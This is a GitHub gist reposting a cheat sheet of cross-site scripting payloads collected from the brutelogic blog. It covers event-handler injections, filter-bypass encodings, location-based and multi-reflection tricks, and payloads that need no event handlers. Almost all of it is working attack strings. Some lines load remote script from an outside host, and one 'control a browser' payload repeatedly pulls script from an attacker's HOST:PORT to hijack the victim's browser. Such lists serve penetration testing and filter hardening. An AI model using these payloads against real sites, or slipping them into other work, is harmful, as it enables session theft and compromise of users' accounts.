
@EnchantedGuardian
Forked from toufik-airane/brutelogic.md
Created April 6, 2017 03:34

Credit: @brutelogic (blog)

Summary

The XSS payloads and schemes used across all of the blog's posts, collected here for quick reference.

XSS Payload Scheme

extra1 <tag spacer1 extra2 spacer2 handler spacer3 = spacer4 code spacer5> extra3

Agnostic Event Handlers

<brute contenteditable onblur=alert(1)>lose focus!

<brute onclick=alert(1)>click this!

<brute oncopy=alert(1)>copy this!

<brute oncontextmenu=alert(1)>right click this!

<brute oncut=alert(1)>copy this!

<brute ondblclick=alert(1)>double click this!

<brute ondrag=alert(1)>drag this!

<brute contenteditable onfocus=alert(1)>focus this!

<brute contenteditable oninput=alert(1)>input here!

<brute contenteditable onkeydown=alert(1)>press any key!

<brute contenteditable onkeypress=alert(1)>press any key!

<brute contenteditable onkeyup=alert(1)>press any key!

<brute onmousedown=alert(1)>click this!

<brute onmousemove=alert(1)>hover this!

<brute onmouseout=alert(1)>hover this!

<brute onmouseover=alert(1)>hover this!

<brute onmouseup=alert(1)>click this!

<brute contenteditable onpaste=alert(1)>paste here!

<brute style=font-size:500px onmouseover=alert(1)>0000

Existing Code Reuse

<script>alert(1)//

<script>alert(1)<!--

<script src=//brutelogic.com.br/1>

<script src=//3237054390/1>

Filter Bypass Procedure

<x onxxx=1

%3Cx onxxx=1

<%78 onxxx=1

<x %6Fnxxx=1

<x o%6Exxx=1

<x on%78xx=1

<x onxxx%3D1

<X onxxx=1

<x ONxxx=1

<x OnXxx=1

<X OnXxx=1

<x onxxx=1 onxxx=1

<x/onxxx=1

<x%09onxxx=1

<x%0Aonxxx=1

<x%0Conxxx=1

<x%0Donxxx=1

<x%2Fonxxx=1

<x 1='1'onxxx=1

<x 1="1"onxxx=1

<x </onxxx=1

<x 1=">" onxxx=1

<http://onxxx%3D1/

<x%2F1=">%22OnXxx%3D1

Probing to Find XSS

param1=1<1&param2=2<1&param3=3<1

Location Based Payloads – Part I

<svg/onload=location='javascript:alert(1)'>

<svg/onload=location=location.hash.substr(1)>#javascript:alert(1)

<svg/onload=location='javas'%2B'cript:'%2B'ale'%2B'rt'%2Blocation.hash.substr(1)>#(1)

<svg/onload=location=/javas/.source%2B/cript:/.source%2B/ale/.source%2B/rt/.source%2Blocation.hash.substr(1)>#(1)

<svg/onload=location=/javas/.source%2B/cript:/.source%2B/ale/.source%2B/rt/.source%2Blocation.hash[1]%2B1%2Blocation.hash[2]>#()

Location Based Payloads – Part II

<svg onload=alert(tagName)>

<javascript onclick=alert(tagName)>click me!

<javascript onclick=alert(tagName%2Blocation.hash)>click me!#:alert(1)

<javascript: onclick=alert(tagName%2Blocation.hash)>click me!#alert(1)

<javascript: onclick=alert(tagName%2BinnerHTML%2Blocation.hash)>/*click me!#*/alert(1)

<javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>/*click me!#*/alert(1)

<javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>'click me!#'-alert(1)

<javascript: onclick=alert(tagName%2BinnerHTML%2Blocation.hash)>'click me!</javascript:>#'-alert(1)

Location Based Payloads – Part III

<javascript onclick=location=tagName%2binnerHTML%2blocation.hash>:/*click me!#*/alert(9)

<javascript onclick=location=tagName%2binnerHTML%2blocation.hash>:'click me!#'-alert(9)

<javascript: onclick=location=tagName%2bURL>click me!#%0Aalert(1)

<javascript:"-' onclick=location=tagName%2bURL>click me!#'-alert(1)

<j onclick=location=innerHTML%2bURL>javascript:"-'click me!</j>#'-alert(1)

<j onclick=location=innerHTML%2bURL>javascript:</j>#%0Aalert(1)

<javas onclick=location=tagName%2binnerHTML%2bURL>cript:"-'click me!</javas>#'-alert(1)

<javas onclick=location=tagName%2binnerHTML%2bURL>cript:</javas>#%0Aalert(1)

"-alert(1)<javascript:" onclick=location=tagName%2bpreviousSibling.nodeValue>click me!

"-alert(1)<javas onclick=location=tagName%2binnerHTML%2bpreviousSibling.nodeValue>cript:"click me!

<alert(1)<!-- onclick=location=innerHTML%2bouterHTML>javascript:1/*click me!*/</alert(1)<!-->

<j 1="*/""-alert(1)<!-- onclick=location=innerHTML%2bouterHTML>javascript:/*click me!

*/"<j"-alert(1)<!-- onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>javascript:/*click me!

*/"<j 1=-alert(9)// onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>javascript:/*click me!

<j onclick=location=innerHTML>javascript%26colon;alert(1)//

<iframe id=t:alert(1) name=javascrip onload=location=name%2bid>

<svg id=?p=<svg/onload=alert(1)%2B onload=location=id>

<svg id=?p=<script/src=//3237054390/1%2B onload=location=id>

<j onclick=location=textContent>?p=%26lt;svg/onload=alert(1)>

<j%26p=<svg%2Bonload=alert(1) onclick=location%2B=outerHTML>click me!

<j onclick=location%2B=textContent>%26p=%26lt;svg/onload=alert(1)>

%26p=%26lt;svg/onload=alert(1)><j onclick=location%2B=document.body.textContent>click me!

Location Based Payloads – Part IV

protocol://domain/path/page?p= text1 <tag handler=code> text2 # text3

Source-Breaking Injections

"onafterscriptexecute=alert(1) 1='

"onbeforescriptexecute=alert(1) 1='

Using XSS to Control a Browser

<svg onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)>

Multi Reflection XSS

<svg onload=write(1)>

p='onload=alert(1)><svg/1='

p='>alert(1)</script><script/1='

p=*/alert(1)</script><script>/*

p=*/alert(1)">'onload="/*<svg/1='

p=`-alert(1)">'onload="`<svg/1='

p=*/</script>'>alert(1)/*<script/1='

p=<svg/1='&q='onload=alert(1)>

p=<svg 1='&q='onload='/*&r=*/alert(1)'>

p=-alert(1)}//\

p=\&q=-alert(1)//

XSS Without Event Handlers

<script>alert(1)</script>

<script src=javascript:alert(1)>

<iframe src=javascript:alert(1)>

<embed src=javascript:alert(1)>

<a href=javascript:alert(1)>click

<math><brute href=javascript:alert(1)>click

<isindex action=javascript:alert(1) type=submit value=click>

<form><button formaction=javascript:alert(1)>click

<form><input formaction=javascript:alert(1) type=submit value=click>

<form><input formaction=javascript:alert(1) type=image value=click>

<form><input formaction=javascript:alert(1) type=image src=http://brutelogic.com.br/webgun/img/youtube1.jpg>

<isindex formaction=javascript:alert(1) type=submit value=click>

<object data=javascript:alert(1)>

<iframe srcdoc=%26lt;svg/o%26%23x6Eload%26equals;alert%26lpar;1)%26gt;>

<svg><script xlink:href=data:,alert(1)></script>

<svg><script xlink:href=data:,alert(1) />

<math><brute xlink:href=javascript:alert(1)>click

<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 />
<animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=%26>

Transcending Context-Based Filters

<math><!--" href=javascript:alert(1)//

" href=javascript:alert(1) <math><!--

lol video<!--"href=javascript:alert(1) style=font-size:50px;display:block;color:transparent;background:url('//brutelogic.com.br/webgun/img/youtube1.jpg');background-repeat:no-repeat --><math><!--

<svg><!--'-alert(1)-'

'-alert(1)-'<svg><!--